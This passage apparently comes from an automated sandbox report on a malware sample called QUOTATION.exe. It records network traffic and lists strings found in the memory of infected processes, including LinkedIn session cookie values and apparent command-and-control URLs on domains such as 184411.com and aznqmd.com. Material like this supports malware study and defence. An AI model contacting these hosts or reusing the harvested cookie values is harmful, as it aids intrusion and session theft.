65 6e 74 3d 22 33 32 30 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e d0 92 d0 b8 d1 82 d1 80 d0 b8 d0 bd d0 b0 20 d0 b4 d0 be d0 bc d0 b5 d0 bd d0 b0 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 68 6f 70 77 69 6e 64 6f 77 2e 63 73 73 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 bf d1 80 d0 be d0 b4 d0 b0 d0 b5 d1 82 d1 81 d1 8f 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 74 72 61 64 65 2e 77 65 62 6e 61 6d 65 73 2e 72 75 2f 69 6d 67 2f 6f 67 5f 69 6d 61 67 65 2e 70 6e 67 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 2d 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 31 30 20 63 6f 6c 2d 6c 67 2d 70 75 73 68 2d 31 22 3e 0a 20 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: openresty/1.13.6.1date: Mon, 20 Mar 2023 14:24:48 GMTcontent-type: text/htmlcontent-length: 175connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:24:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:24:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:24:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:25:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: explorer.exe, 00000009.00000002.8041134967.000000001445C000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.0000000005E8C000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
          Source: help.exe, 0000000A.00000002.7996001567.0000000003676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
          Source: help.exe, 0000000A.00000002.7996001567.0000000003695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://23.83.160.2:88/tz.php?ref=
          Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://batit.aliyun.com/alww.html
          Source: explorer.exe, 00000009.00000002.8041134967.000000001562A000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000050EA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://browsehappy.com/
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: QUOTATION.exe, 00000008.00000003.4190420029.000000000348F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.3934592654.0000000003492000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4189935994.000000000348E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: QUOTATION.exe, 00000008.00000003.4190420029.000000000348F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.3934592654.0000000003492000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4189935994.000000000348E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: explorer.exe, 00000009.00000003.6307208698.0000000010468000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4739275990.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8032051165.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6116549560.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4927766951.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4227133782.0000000010469000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
          Source: QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
          Source: QUOTATION.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: QUOTATION.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000009.00000003.4743238865.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6463260519.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6120364620.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8026780659.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6283225298.000000000D45E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
          Source: explorer.exe, 00000009.00000003.6307208698.0000000010468000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4739275990.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8032051165.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6116549560.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4927766951.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4227133782.0000000010469000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: http://ocsp.digicert.com0O
          Source: explorer.exe, 00000009.00000000.4229381389.00000000106E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6308723662.00000000106E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4928720614.00000000106E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6293964967.00000000106E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6113969628.00000000106E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8033672168.00000000106E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6280975469.00000000106E7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
          Source: explorer.exe, 00000009.00000003.4739275990.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6309623031.0000000010710000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6461447970.0000000010710000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8033940684.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6293964967.0000000010710000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://ocsp.thawte.com0
          Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: QUOTATION.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
          Source: QUOTATION.exeString found in binary or memory: http://s.symcd.com06
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://s2.symcb.com0
          Source: explorer.exe, 00000009.00000002.8017544458.000000000B240000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8000325790.00000000032D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.4214945056.000000000A840000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000009.00000002.8021127369.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://sv.symcb.com/sv.crt0
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://sv.symcd.com0&
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://trade.webnames.ru
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://trade.webnames.ru/img/og_image.png
          Source: QUOTATION.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
          Source: QUOTATION.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
          Source: QUOTATION.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.com
          Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.com/d91r/
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.184411.comwww.b-tek.media
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.com
          Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.aznqmd.com/d91r/
